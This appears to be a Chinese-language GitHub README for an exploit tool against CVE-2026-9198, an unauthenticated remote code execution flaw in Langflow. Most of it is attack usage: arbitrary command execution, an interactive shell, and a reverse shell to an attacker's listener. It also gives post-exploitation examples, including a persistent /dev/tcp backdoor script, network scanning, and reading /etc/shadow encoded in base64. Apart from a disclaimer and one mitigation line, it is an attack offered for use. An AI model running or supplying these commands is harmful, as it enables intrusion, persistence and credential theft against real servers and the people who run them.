CVE-2026-9198 是 IBM Langflow OSS 中的一个关键未经身份验证的远程代码执行漏洞。该利用程序链式利用了以下两个漏洞:
/api/v1/validate/code 端点中的代码注入,允许任意 Python 执行⚠️ 警告:此工具仅用于授权的安全测试和教育目的。未经授权的使用是非法的。
pip 包管理器git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198
pip install termcolor
或者一次性安装所有依赖项:
pip install -r requirements.txt
python CVE-2026-9198.py --help
您应该会看到包含所有可用选项的帮助菜单。
在目标上执行单个命令:
python CVE-2026-9198.py -t <target_ip> -c "id"
示例:
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"
启动带有动态提示符的交互式 Shell:
python CVE-2026-9198.py -t <target_ip> --shell
特性:
user@host 和当前目录cd 命令,并自动更新提示符示例会话:
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp
发送反弹 Shell 负载到监听器:
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>
示例:
# 在您的机器上 - 启动监听器
nc -lvnp 4444
# 然后运行利用程序
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444
如果 Langflow 运行在非默认端口上:
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"
示例:
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"
跳过自动登录过程并使用现有令牌:
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"
为较慢的网络调整 HTTP 超时:
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"
python CVE-2026-9198.py -t 192.168.1.100 --shell
# 然后在 Shell 内:
ls -la
cat /etc/passwd
# 创建一个持久性的反弹 Shell
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"
为防范此漏洞:
/api/v1/auto_login 和 /api/v1/validate/code 的异常 API 请求此工具仅供教育和授权的安全测试目的使用。作者不对因使用本软件而导致的任何误用或损害负责。用户有责任遵守适用的法律法规。
本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。
0xgh057r3c0n
欢迎贡献!请随时提交 Pull Request。
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)如果您觉得此工具有用,请在 GitHub 上给它一个 ⭐!
| 参数 | 描述 | 必需 | 默认值 |
|---|
-t, --target | 目标主机/IP 或完整 URL | ✅ 是 | - |
-p, --port | Langflow 端口 | ❌ 否 | 7860 |
-c, --cmd | 执行单个命令 | ❌ 否 | "id" |
--shell | 交互式伪 Shell 模式 | ❌ 否 | False |
--lhost | 反弹 Shell 监听器 IP | ❌ 否 | - |
--lport | 反弹 Shell 监听器端口 | ❌ 否 | 4444 |
-k, --token | 使用提供的 Bearer 令牌 | ❌ 否 | - |
--timeout | HTTP 超时(秒) | ❌ 否 | 20 |
--no-banner | 隐藏横幅 | ❌ 否 | False |